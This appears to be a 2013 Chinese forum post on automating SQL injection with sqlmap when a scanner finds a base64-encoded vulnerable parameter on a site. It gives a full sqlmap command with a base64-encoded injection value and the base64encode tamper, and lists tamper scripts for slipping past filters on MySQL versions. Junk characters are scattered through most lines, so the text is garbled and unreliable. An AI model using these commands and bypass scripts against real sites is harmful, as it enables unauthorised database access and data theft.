WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
! A' E5 \9 m; |; f' q
" }. q7 L3 e9 Z# M' n8 k( v" Dsqlmap的tamper里有个base64encode.py
# z8 v# @6 C" n2 L- L+ U) I! n) L5 {$ Z8 a! m! K
使用如下
* h5 q3 B5 y6 R+ P- R9 t- F1 ~
0 ~# V# i7 g( F, [* {+ @$ Gsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs/ j6 B7 e' x8 ^$ ]; P
, A" P; q7 }! r
+ b" g2 L4 p1 \sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
n) |, i! C3 H/ \. n3 l) H. N$ ~
' q: Z) M& |' X其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
+ {5 b" f6 D/ I7 C* I8 D3 v
, z& O/ b8 `. r* e3 c- f/ Wspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入9 N5 }3 Z9 P/ \3 `
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入7 [* P* l5 r- B3 K0 f) x
首先确定目标数据库版本,然后选择相应的脚本。) f4 H0 m* [1 x
-v 3 --batch --tamper "space2hash.py"* m( G. K; i {* X6 A
$ Q2 \8 E) P% |' y
还有其他一些插件:. {2 ^6 Z" Y! z
encodes编码 ——charencode.py3 V& c$ ?) g4 ~$ i* ]
base64编码 —— base64encode.py
# `0 @' l# m- H F# k替换空格和关键字 —— halfversionedmorekeywords.py& T* E) E4 d ]: n- R' W+ T# ^
|
; D, C4 N B* \( V3 o
1 ?; \' ?3 e! y4 U8 u3 R1 q' ]6 u; R6 b8 P; ^
r( Y% l6 _* c! x8 R
|
发表于 2013-11-23 15:50:45
收藏
支持
反对